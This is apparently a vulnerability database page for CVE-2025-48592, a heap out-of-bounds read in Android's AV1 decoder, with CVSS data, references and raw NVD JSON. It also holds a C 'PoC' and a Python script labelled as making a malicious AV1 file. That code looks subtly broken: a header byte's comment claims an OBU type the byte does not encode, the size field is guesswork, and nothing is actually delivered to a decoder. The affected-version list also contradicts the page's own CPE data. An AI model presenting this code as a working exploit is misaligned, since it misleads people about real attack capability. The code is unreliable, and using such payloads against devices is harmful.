Security Vulnerability Report
CVE-2025-48592 CVSS 7.5 HIGH

CVE-2025-48592

Published: 2025-12-08 17:16:16
Last Modified: 2025-12-08 21:15:57

Description

In initDecoder of C2SoftDav1dDec.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android frameworks/av (C2SoftDav1dDec) < 2025-12-01 security patch
Android 12L (API level 32)
Android 13 (API level 33)
Android 14 (API level 34)
Android 15 (API level 35)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-48592 PoC - Android AV1 Decoder Heap Overflow
// Generate malicious AV1 video stream to trigger OOB read in C2SoftDav1dDec
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// AV1 OBU (Open Bitstream Unit) header structure
typedef struct {
    unsigned int forbidden_bit:1;
    unsigned int type:4;
    unsigned int extension_flag:1;
    unsigned int has_size:1;
    unsigned int reserved:1;
} OBUHeader;

// Malicious payload to trigger heap buffer overflow
unsigned char* create_malicious_av1_payload(size_t* out_size) {
    // Craft OBU with oversized data to trigger OOB read
    unsigned char* payload = malloc(1024);
    if (payload == NULL) {
        *out_size = 0;
        return NULL;
    }
    memset(payload, 0, 1024);

    // OBU header - Frame header type
    payload[0] = 0x0A; // type=5 (OBU_FRAME), has_size=1

    // Size field (large value to cause overflow)
    payload[1] = 0xFF;
    payload[2] = 0xFF;
    payload[3] = 0xFF;

    // Fill with data that will trigger OOB read when parsed
    memset(payload + 4, 0x41, 1020); // Pattern to identify leaked data

    *out_size = 1024;
    return payload;
}

// Simulate triggering the vulnerable code path
void trigger_vulnerability() {
    size_t payload_size;
    unsigned char* malicious_data = create_malicious_av1_payload(&payload_size);
    if (malicious_data == NULL) {
        printf("[!] Allocation failed\n");
        return;
    }

    // This would be called in the context of C2SoftDav1dDec::initDecoder
    // In real exploitation, the video would be processed by Android MediaCodec
    printf("[*] Malicious AV1 payload created: %zu bytes\n", payload_size);
    printf("[*] Send this payload to Android AV1 decoder via MediaCodec\n");

    free(malicious_data);
}

int main() {
    printf("CVE-2025-48592 PoC - Android AV1 Decoder Heap Overflow\n");
    printf("Target: C2SoftDav1dDec::initDecoder in frameworks/av\n");
    printf("Vulnerability: Heap buffer overflow leading to OOB read\n\n");

    trigger_vulnerability();

    printf("\n[*] Note: This PoC demonstrates the concept.\n");
    printf("[*] Actual exploitation requires Android device with vulnerable version.\n");
    return 0;
}

// Python script to generate malicious AV1 file
/*
#!/usr/bin/env python3
import struct

def generate_malicious_av1():
    # Craft AV1 OBU with oversized payload
    obu_header = bytes([0x0A])        # OBU_FRAME with size
    size = struct.pack('>I', 0xFFFF)  # Oversized length
    payload = b'\x41' * 0xFFFF        # Fill data
    with open('malicious.av1', 'wb') as f:
        f.write(obu_header + size + payload)
    print(f"Generated malicious AV1 file: {len(obu_header + size + payload)} bytes")

if __name__ == '__main__':
    generate_malicious_av1()
*/

References

https://android.googlesource.com/platform/frameworks/av/+/8febdebcb5e8736ec013a7d64e70f50e87649b52 (Patch, Product)
https://source.android.com/security/bulletin/2025-12-01 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-48592",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-08T17:16:16.407",
    "lastModified": "2025-12-08T21:15:56.860",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "In initDecoder of C2SoftDav1dDec.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        },
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]},
      {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://android.googlesource.com/platform/frameworks/av/+/8febdebcb5e8736ec013a7d64e70f50e87649b52", "source": "[email protected]", "tags": ["Patch", "Product"]},
      {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}